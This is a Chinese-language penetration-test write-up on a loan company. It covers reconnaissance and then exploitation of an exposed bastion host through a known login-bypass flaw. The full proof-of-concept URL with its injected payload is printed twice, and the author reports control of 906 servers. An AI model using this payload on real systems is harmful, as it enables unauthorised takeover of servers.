記一次某貸款公司從0到100的滲透測試記錄

前言

由于傳播、利用此文所提供的信息而造成的任何直接或者間接的后果及損失，均由使用者本人負責，文章作者不為此承擔任何責任。漏洞測試結束后已將漏洞提交漏洞平臺。

信息收集

首先通過愛企查找到某某貸款公司，查看備案域名，進行子域名收集，以及fofa收集。

圖1-1 愛企查備案站點收集

將發現的域名可通過燈塔以及fofa進行收集，備案號也可進行收集遍歷后面的號數。

域名fofa語法:domain=xxx.com
備案號fofa語法：body=xxICP備xxxx號-x

圖1-2 1-3 為fofa資產收集

燈塔收集：

圖1-4 資產燈塔系統資產收集

這里推介使用燈塔進行收集，因為很多小的收集工具已經集成在燈塔里了，我們就不需要在去挨個下了，但是如果對方是有waf秒封的ip的話還是推介人工收集，方法就以上幾種不多說了。

漏洞發現

此時我們可以將收集的資產先放掃描器過一遍，掃描器掃的同時我們就手工測試對方系統的邏輯漏洞、cms漏洞、反序列化漏洞等等。

這里呢我推介大家使用一個谷歌插件Wappalyzer,此插件的好處可以識別對方使用的cms系統以及用的編程語言、中間件、操作系統等，這樣不僅免去了我們手工測試的麻煩還可以第一時間通過得到的上述信息精準打擊。

圖2-1 Wappalyzer網站技術分析插件

通過收集和掃描將近三四個小時的努力發現了對方將堡壘機映射出外網，且該堡壘機在2021年4月通報過一個高危漏洞:任意用戶登錄，通過poc探測對方存在此漏洞。

https://xxx.xxx.com:6443/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm

圖2-2 poc測試圖

漏洞利用

首先通過poc測試的漏洞來進行查看用戶以及切換切換用戶。

圖3-1 會話審計圖

通過會話發現對方近期都有登錄過堡壘機里的機器，此時嘗試將審計用戶切換為配置管理員查看對方的哪一個用戶掌管機器的。

圖3-2 配置用戶關聯設備

通過圖3-2知道了大量設備都于sys這個用戶有關聯，因此我們直接切換該用戶進行查看。

https://xxx.xxx.com:6443/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=sys

圖 3-3 sys普通用戶權限圖

通過3-3可知已將對方打穿，可管控服務器906臺，至此滲透結束。

結束語

本文章主要講解了從信息收集到漏洞發現以及利用的全過程，其實漏洞不止這一個但是此漏洞具有代表性，感謝各位師傅觀看！